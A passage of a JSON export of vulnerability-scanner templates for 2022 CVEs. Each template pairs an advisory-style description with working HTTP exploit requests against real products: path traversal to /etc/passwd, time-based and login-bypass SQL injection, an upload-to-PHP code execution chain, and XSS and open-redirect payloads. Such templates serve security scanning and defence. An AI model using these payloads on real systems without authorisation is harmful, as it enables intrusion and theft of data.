4a0a00473045022053679076bc7557501e02d91d43aef620a97ae250150ec9582e38ba855f404c6c022100c8428d2b76fa3b6dc76a6218b76fe10761ac009d56feb84be0cddc2a9f54cfa5:922c64590222798bb761d5b6d8e72950", "hash": "707ad86ed81205a277779c7bdc55ee41", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30856f" }, "name": "CVE-2022-37191.yaml", "content": "id: CVE-2022-37191\n\ninfo:\n name: Cuppa CMS v1.0 - Authenticated Local File Inclusion\n author: theamanrawat\n severity: medium\n description: |\n The component \"cuppa/api/index.php\" of CuppaCMS v1.0 is vulnerable to LFI. An authenticated user can read system files via a crafted POST request using the [function] parameter value as the LFI payload.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, potential data leakage, and remote code execution.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the authenticated local file inclusion vulnerability in Cuppa CMS v1.0.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-37191\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2022-37191\n cwe-id: CWE-829\n epss-score: 0.46328\n epss-percentile: 0.97122\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: cuppacms\n product: cuppacms\n tags: cve,cve2022,lfi,cuppa,authenticated,cuppacms\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n POST /components/table_manager/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n path=component%2Ftable_manager%2Fview%2Fcu_api_keys\n - |\n POST /api/index.php HTTP/1.1\n Host: {{Hostname}}\n 
key: {{apikey}}\n Content-Type: application/x-www-form-urlencoded\n\n function=./../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd/\n\n matchers-condition: and\n matchers:\n - type: word\n part: header_3\n words:\n - \"text/html\"\n\n - type: regex\n part: body_3\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: apikey\n group: 1\n regex:\n - \"(.*?)\"\n internal: true\n# digest: 4b0a00483046022100904cc1a592552a2c9efd1a803e2a5a5680978eedc314a4ec299062cd14edb5a4022100fd7b972b8ba3218b82bbd8a155497cf3d8d1b67134bdc2b3579f6f06970e0aea:922c64590222798bb761d5b6d8e72950", "hash": "32f5e13f6d00c957b9b603fda5f26b35", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308570" }, "name": "CVE-2022-37299.yaml", "content": "id: CVE-2022-37299\n\ninfo:\n name: Shirne CMS 1.2.0 - Local File Inclusion\n author: pikpikcu\n severity: medium\n description: Shirne CMS 1.2.0 is vulnerable to local file inclusion which could cause arbitrary file read via /static/ueditor/php/controller.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system.\n remediation: |\n Upgrade to the latest version of Shirne CMS or apply the vendor-provided patch to mitigate the LFI vulnerability.\n reference:\n - https://twitter.com/pikpikcu/status/1568316864690028544\n - https://gitee.com/shirnecn/ShirneCMS/issues/I5JRHJ?from=project-issue\n - https://nvd.nist.gov/vuln/detail/CVE-2022-37299\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 6.5\n cve-id: CVE-2022-37299\n cwe-id: CWE-22\n epss-score: 0.00772\n epss-percentile: 0.80878\n cpe: cpe:2.3:a:shirne_cms_project:shirne_cms:1.2.0:*:*:*:*:*:*:*\n metadata:\n 
verified: true\n max-request: 1\n vendor: shirne_cms_project\n product: shirne_cms\n tags: cve,cve2022,shirnecms,lfi,shirne_cms_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/static/ueditor/php/controller.php?action=proxy&remote=php://filter/convert.base64-encode/resource=/etc/passwd&maxwidth=-1&referer=test\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"cm9vd\" # root in base64\n\n - type: word\n part: header\n words:\n - \"image/png\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a0048304602210094bc65c10f89d2bb9c87686eba12f012554fc0ce21425c4d59230a1d8de5f4a9022100cf813f36fe3c9da4e06e3a7ee76fc66362ee7b3a792eba20f1c7d6f5abc0c98d:922c64590222798bb761d5b6d8e72950", "hash": "acc71bd5a42edcb007fa4eee2b9c8a52", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308571" }, "name": "CVE-2022-3768.yaml", "content": "id: CVE-2022-3768\n\ninfo:\n name: WordPress WPSmartContracts <1.3.12 - SQL Injection\n author: Hardik-Solanki\n severity: high\n description: |\n WordPress WPSmartContracts plugin before 1.3.12 contains a SQL injection vulnerability. The plugin does not properly sanitize and escape a parameter before using it in a SQL statement. 
An attacker with a role as low as author can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations.\n impact: |\n An attacker can execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: Fixed in version 1.3.12\n reference:\n - https://wpscan.com/vulnerability/1d8bf5bb-5a17-49b7-a5ba-5f2866e1f8a3\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3768\n - https://cve.report/CVE-2022-3768\n - https://bulletin.iese.de/post/wp-smart-contracts_1-3-11/\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-3768\n cwe-id: CWE-89\n epss-score: 0.01715\n epss-percentile: 0.86512\n cpe: cpe:2.3:a:wpsmartcontracts:wpsmartcontracts:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: wpsmartcontracts\n product: wpsmartcontracts\n framework: wordpress\n tags: cve,cve2022,wp-smart-contracts,wpscan,wp-plugin,sqli,wordpress,wp,authenticated,wpsmartcontracts\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Origin: {{RootURL}}\n Content-Type: application/x-www-form-urlencoded\n Cookie: wordpress_test_cookie=WP%20Cookie%20check\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n\n - |\n @timeout: 15s\n GET /wp-admin/edit.php?post_type=nft&page=nft-batch-mint&step=4&collection_id=1+AND+(SELECT+7741+FROM+(SELECT(SLEEP(7)))hlAf)&uid=1 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'duration_2>=7'\n - 'status_code_2 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_2, \"Batch Mint NFTs\")'\n condition: and\n# digest: 4b0a00483046022100bd925a5d0628000976660fe729e42a7f314f002bfb6407b82e26f1b090b62a4d022100b482d42c6c8674fb3ced86981e2df21831b145496f590b50dec1531c3d60d471:922c64590222798bb761d5b6d8e72950", "hash": 
"1f82ef7e42528e9cbfd1b65a2d0a2814", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308572" }, "name": "CVE-2022-3800.yaml", "content": "id: CVE-2022-3800\n\ninfo:\n name: IBAX - SQL Injection\n author: JC175\n severity: high\n description: |\n IBAX go-ibax functionality is susceptible to SQL injection via the file /api/v2/open/rowsInfo. The manipulation of the argument table_name leads to SQL injection, and the attack may be launched remotely. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n To remediate this vulnerability, ensure that all user-supplied input is properly validated and sanitized before being used in SQL queries. Implement parameterized queries or use an ORM framework to prevent SQL injection attacks.\n reference:\n - https://github.com/IBAX-io/go-ibax/issues/2061\n - https://vuldb.com/?id.212636\n - https://nvd.nist.gov/vuln/detail/CVE-2022-3800\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2022-3800\n cwe-id: CWE-89,CWE-707\n epss-score: 0.05291\n epss-percentile: 0.92303\n cpe: cpe:2.3:a:ibax:go-ibax:-:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: ibax\n product: go-ibax\n tags: cve2022,cve,ibax,go-ibax,sqli\n\nhttp:\n - raw:\n - |\n @timeout: 15s\n POST /api/v2/open/rowsInfo HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n order=1&table_name=pg_user\"%3b+select+pg_sleep(6)%3b+--\"&limit=1&page=1\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(content_type, \"application/json\")'\n - 'contains(body, \"usesysid\")'\n condition: and\n# digest: 
490a0046304402201f15cc161ca0936b83e8f97725a8c7682727e50af295464970a0119f45333c8902202333cca77720c53959b684542fef75975bccfe288152444357d2657e50a796ab:922c64590222798bb761d5b6d8e72950", "hash": "9ec79fe9a9d584877e61c0ad832472d9", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308573" }, "name": "CVE-2022-38131.yaml", "content": "id: CVE-2022-38131\n\ninfo:\n name: RStudio Connect - Open Redirect\n author: xxcdd\n severity: medium\n description: |\n RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.\n impact: |\n An attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.\n remediation: |\n This issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.\n reference:\n - https://tenable.com/security/research/tra-2022-30\n - https://support.posit.co/hc/en-us/articles/10983374992023-CVE-2022-38131-configuration-issue-in-Posit-Connect\n - https://github.com/JoshuaMart/JoshuaMart\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-38131\n cwe-id: CWE-601\n epss-score: 0.0006\n epss-percentile: 0.23591\n cpe: cpe:2.3:a:rstudio:connect:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: rstudio\n product: connect\n shodan-query: \"http.favicon.hash:217119619\"\n fofa-query: \"app=\\\"RStudio-Connect\\\"\"\n tags: tenable,cve,cve2022,redirect,rstudio\n\nhttp:\n - raw:\n - |\n GET //%5cexample.com HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)example\\.com\\/?(\\/|[^.].*)?$'\n\n - 
type: status\n status:\n - 307\n# digest: 490a0046304402200b9d41c0309ab333bc791e17f4889c4b508a20ade256857de387596a939fb4c902200510b2369cd933fdeb6f527cf54398cb913417dac88699d63249c20b88272874:922c64590222798bb761d5b6d8e72950", "hash": "d283fd2dc6ffd59fdda2ac252f95f20c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308574" }, "name": "CVE-2022-38295.yaml", "content": "id: CVE-2022-38295\n\ninfo:\n name: Cuppa CMS v1.0 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: |\n Cuppa CMS v1.0 was discovered to contain a cross-site scripting vulnerability at /table_manager/view/cu_user_groups. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field under the Add New Group function.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To remediate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38295\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-38295\n cwe-id: CWE-79\n epss-score: 0.00269\n epss-percentile: 0.64416\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: cuppacms\n product: cuppacms\n tags: cve2022,cve,xss,cuppa,authenticated,cuppacms\n\nhttp:\n - raw:\n - |\n POST / HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n user={{username}}&password={{password}}&language=en&task=login\n - |\n POST /components/table_manager/classes/functions.php 
HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n id_field=0&name_field=\">&admin_login_field=1&site_login_field=1&enabled_field=1&view=cu_user_groups&function=saveAdminTable\n - |\n POST /components/table_manager/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n path=component%2Ftable_manager%2Fview%2Fcu_user_groups&uniqueClass=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - '\">'\n - 'cuppa_html'\n condition: and\n\n - type: word\n part: header_3\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502205702724d42507ffc7d8cd044e6d6cf80b1f1c0a3064667003638e86af6920a29022100c1aa20860b9fe2846eca8e70f515a44501a69d01c6e6e2f1e78c634a549800ce:922c64590222798bb761d5b6d8e72950", "hash": "92c6e874cd8d0d2c33f0338cd6de7efc", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308575" }, "name": "CVE-2022-38296.yaml", "content": "id: CVE-2022-38296\n\ninfo:\n name: Cuppa CMS v1.0 - Arbitrary File Upload\n author: theamanrawat\n severity: critical\n description: |\n Cuppa CMS v1.0 was discovered to contain an arbitrary file upload vulnerability via the File Manager.\n impact: |\n Successful exploitation of this vulnerability can lead to remote code execution and compromise of the affected system.\n remediation: |\n Apply the latest patch or upgrade to a newer version of Cuppa CMS to mitigate this vulnerability.\n reference:\n - https://github.com/CuppaCMS/CuppaCMS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38296\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-38296\n cwe-id: CWE-434\n epss-score: 0.02351\n epss-percentile: 0.88674\n cpe: cpe:2.3:a:cuppacms:cuppacms:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: cuppacms\n product: cuppacms\n tags: 
cve,cve2022,rce,cuppa,intrusive,cuppacms\n\nhttp:\n - raw:\n - |\n POST /js/jquery_file_upload/server/php/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"path\"\n\n /\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"unique_name\"\n\n true\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"resize_width\"\n\n\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"resize_height\"\n\n\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"crop\"\n\n\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"compress\"\n\n\n ------WebKitFormBoundary9MZjlIG8fVPjrlCI\n Content-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\n Content-Type: image/jpeg\n\n \n ------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n - |\n POST /js/filemanager/api/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n - |\n GET /media/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - ed6bf8b1b4b8e64836455fe32b958c2c\n condition: and\n\n - type: word\n part: header_3\n words:\n - text/html\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: filename\n group: 1\n regex:\n - '\"name\":\"(.*?)\",'\n internal: true\n# digest: 4a0a004730450221008e6f64cbcac30a77559654a774f32ae62113b17ec9d03eef4da8a86d796f2d2d0220687c6d62f1c3abc958148a0289f7076ec9819d04b320980f98c45a7caa8288a6:922c64590222798bb761d5b6d8e72950", "hash": "6fb6026a0f7643a360e14862f8f43848", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308576" }, "name": "CVE-2022-38463.yaml", 
"content": "id: CVE-2022-38463\n\ninfo:\n name: ServiceNow - Cross-Site Scripting\n author: amanrawat\n severity: medium\n description: |\n ServiceNow through San Diego Patch 4b and Patch 6 contains a cross-site scripting vulnerability in the logout functionality, which can enable an unauthenticated remote attacker to execute arbitrary JavaScript.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, data theft, or defacement of the affected ServiceNow instance.\n remediation: |\n Apply the latest security patches provided by ServiceNow to mitigate this vulnerability.\n reference:\n - https://support.servicenow.com/kb?id=kb_article_view&sysparm_article=KB1156793\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38463\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-38463\n cwe-id: CWE-79\n epss-score: 0.00174\n epss-percentile: 0.53646\n cpe: cpe:2.3:a:servicenow:servicenow:san_diego:patch_4:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: servicenow\n product: servicenow\n shodan-query: http.title:\"ServiceNow\"\n tags: cve,cve2022,servicenow,xss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"top.location.href = 'javascript:alert(document.domain)';\"\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220602dde2b93eb0d41d3c031c0120a9007197dfb886c56eb72c39a68e752d55dde022100f6fd085c092dc14047ca0974a626fcb410641ff5f391c3d454c2707f5efd823a:922c64590222798bb761d5b6d8e72950", "hash": 
"f69b6e2b6bcf8c69b0fba777248b8522", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308577" }, "name": "CVE-2022-38467.yaml", "content": "id: CVE-2022-38467\n\ninfo:\n name: CRM Perks Forms < 1.1.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n The plugin does not sanitise and escape some parameters from a sample file before outputting them back in the page, leading to Reflected Cross-Site Scripting\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: Fixed in version 1.1.1\n reference:\n - https://wpscan.com/vulnerability/4b128c9c-366e-46af-9dd2-e3a9624e3a53\n - https://wordpress.org/plugins/crm-perks-forms/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38467\n - https://patchstack.com/database/vulnerability/crm-perks-forms/wordpress-crm-perks-forms-plugin-1-1-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-38467\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.37951\n cpe: cpe:2.3:a:crmperks:crm_perks_forms:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: crmperks\n product: crm_perks_forms\n framework: wordpress\n tags: cve2022,cve,crm-perks-forms,wpscan,wordpress,wp,wp-plugin,xss,crmperks\n\nhttp:\n - raw:\n - |\n GET /wp-content/plugins/crm-perks-forms/readme.txt HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/crm-perks-forms/templates/sample_file.php?FirstName=&LastName=&%20Company= HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_1 == 200'\n - 'contains(content_type_2, \"text/html\")'\n - 'contains(body_1, \"CRM Perks Forms\") && 
contains(body_2, \"\")'\n condition: and\n# digest: 490a004630440220729431423049e0675d567b6cbd1d77e01b4e70f542ae8a569d9765cf8dcd344b02205d87faab9dfcd79998b0d0e68c7e91eb95180dd93bf447409ae8c7579e50761b:922c64590222798bb761d5b6d8e72950", "hash": "fadaa8e307930a6e7a0ffd2796a075c1", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308578" }, "name": "CVE-2022-38553.yaml", "content": "id: CVE-2022-38553\n\ninfo:\n name: Academy Learning Management System <5.9.1 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n Academy Learning Management System before 5.9.1 contains a cross-site scripting vulnerability via the Search parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to Academy Learning Management System version 5.9.1 or later to mitigate the XSS vulnerability.\n reference:\n - https://www.youtube.com/watch?v=yFiZffHoeKs&ab_channel=4websecurity\n - https://github.com/4websecurity/CVE-2022-38553\n - https://codecanyon.net/item/academy-course-based-learning-management-system/22703468\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38553\n - http://academy.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-38553\n cwe-id: CWE-79\n epss-score: 0.00218\n epss-percentile: 0.5972\n cpe: cpe:2.3:a:creativeitem:academy_learning_management_system:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: creativeitem\n product: academy_learning_management_system\n google-query: intext:\"Study any topic, 
anytime\"\n tags: cve2022,cve,academylms,xss,creativeitem\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/search?query=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\">'\n - 'Study any topic'\n condition: and\n\n - type: word\n part: header\n words:\n - 'text/html'\n\n - type: status\n status:\n - 200\n# digest: 490a004630440220198f27be524ccad8572426583afc7404f4eadb4ee97c8673dfcc45c69474e4cc02205db8821d527e95ccb104e194cba4ad01b37bd10b23d007f2b2b49dd6dbc40b62:922c64590222798bb761d5b6d8e72950", "hash": "a1f8fd07dafae6579b098717509e3135", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308579" }, "name": "CVE-2022-38637.yaml", "content": "id: CVE-2022-38637\n\ninfo:\n name: Hospital Management System 1.0 - SQL Injection\n author: arafatansari\n severity: critical\n description: |\n Hospital Management System 1.0 contains a SQL injection vulnerability via the editid parameter in /HMS/user-login.php. 
An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.youtube.com/watch?v=m8nW0p69UHU\n - https://owasp.org/www-community/attacks/SQL_Injection\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38637\n - https://github.com/Henry4E36/POCS\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-38637\n cwe-id: CWE-89\n epss-score: 0.01231\n epss-percentile: 0.85126\n cpe: cpe:2.3:a:hospital_management_system_project:hospital_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: hospital_management_system_project\n product: hospital_management_system\n shodan-query: http.html:\"Hospital Management System\"\n tags: cve,cve2022,hms,cms,sqli,auth-bypass,hospital_management_system_project\n\nhttp:\n - raw:\n - |\n POST /hms/user-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username=admin%27+or+%271%27%3D%271%27%23&password=admin%27+or+%271%27%3D%271%27%23&submit=\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'User | Dashboard'\n - 'Book My Appointment'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100a8383f340fa0dfe055b740805fc9006b8240efd45919da33d427bf756f32ea3002202ce22932462286045aba1b3fcbf86f9f3abb7035232fbf32730b0d01b48c2f4b:922c64590222798bb761d5b6d8e72950", "hash": "1fb29f8d7f7b64d4109eeb7f86239f60", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": 
{ "$oid": "66477a413521042ccf30857a" }, "name": "CVE-2022-38794.yaml", "content": "id: CVE-2022-38794\n\ninfo:\n name: Zaver - Local File Inclusion\n author: pikpikcu\n severity: high\n description: |\n Zaver through 2020-12-15 is vulnerable to directory traversal (reported as local file inclusion) via /.. sequences in the GET request path, allowing retrieval of arbitrary files readable by the server process.\n impact: |\n This vulnerability can lead to disclosure of arbitrary files readable by the server process (this template reads /etc/passwd) and leakage of sensitive data. The CVSS vector (C:H/I:N/A:N) reflects confidentiality impact only; remote code execution would require further chaining.\n remediation: |\n Canonicalize the request path and reject any resolved path that escapes the configured web root before it is used to open a file, and avoid exposing the server directly to untrusted networks.\n reference:\n - https://github.com/zyearn/zaver/issues/22\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38794\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-38794\n cwe-id: CWE-22\n epss-score: 0.00536\n epss-percentile: 0.7469\n cpe: cpe:2.3:a:zaver_project:zaver:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zaver_project\n product: zaver\n tags: cve,cve2022,lfi,zaver,zaver_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/../../../../../../../../etc/passwd'\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:[x*]:0:0\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402200ed779a9f9687940b2962eb1cb81f498633c303dafce9c65a87715c7441bba2302202d18e5e190defccdc3cd1e37a554cbd556bac428d069591d6ebf5e90df3e8ba1:922c64590222798bb761d5b6d8e72950", "hash": "a2b010e791790803785437840ba13145", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30857b" }, "name": "CVE-2022-38817.yaml", "content": "id: CVE-2022-38817\n\ninfo:\n name: Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control\n author: For3stCo1d\n severity: high\n description: |\n Dapr Dashboard 0.1.0 through 0.10.0 is susceptible to improper access control. 
An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n The vulnerability allows unauthorized access to the Dapr Dashboard, potentially leading to unauthorized actions and data exposure.\n remediation: |\n Upgrade Dapr Dashboard to a version that includes the fix for CVE-2022-38817 or apply the necessary patches provided by the vendor.\n reference:\n - https://github.com/dapr/dashboard/issues/222\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38817\n - https://github.com/dapr/dashboard\n - https://nvd.nist.gov/vuln/detail/CVE-2022-38817\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-38817\n cwe-id: CWE-306\n epss-score: 0.01019\n epss-percentile: 0.82099\n cpe: cpe:2.3:a:linuxfoundation:dapr_dashboard:*:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: linuxfoundation\n product: dapr_dashboard\n shodan-query: http.title:\"Dapr Dashboard\"\n tags: cve,cve2022,dapr,dashboard,unauth,linuxfoundation\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/components/statestore\"\n - \"{{BaseURL}}/overview\"\n - \"{{BaseURL}}/controlplane\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 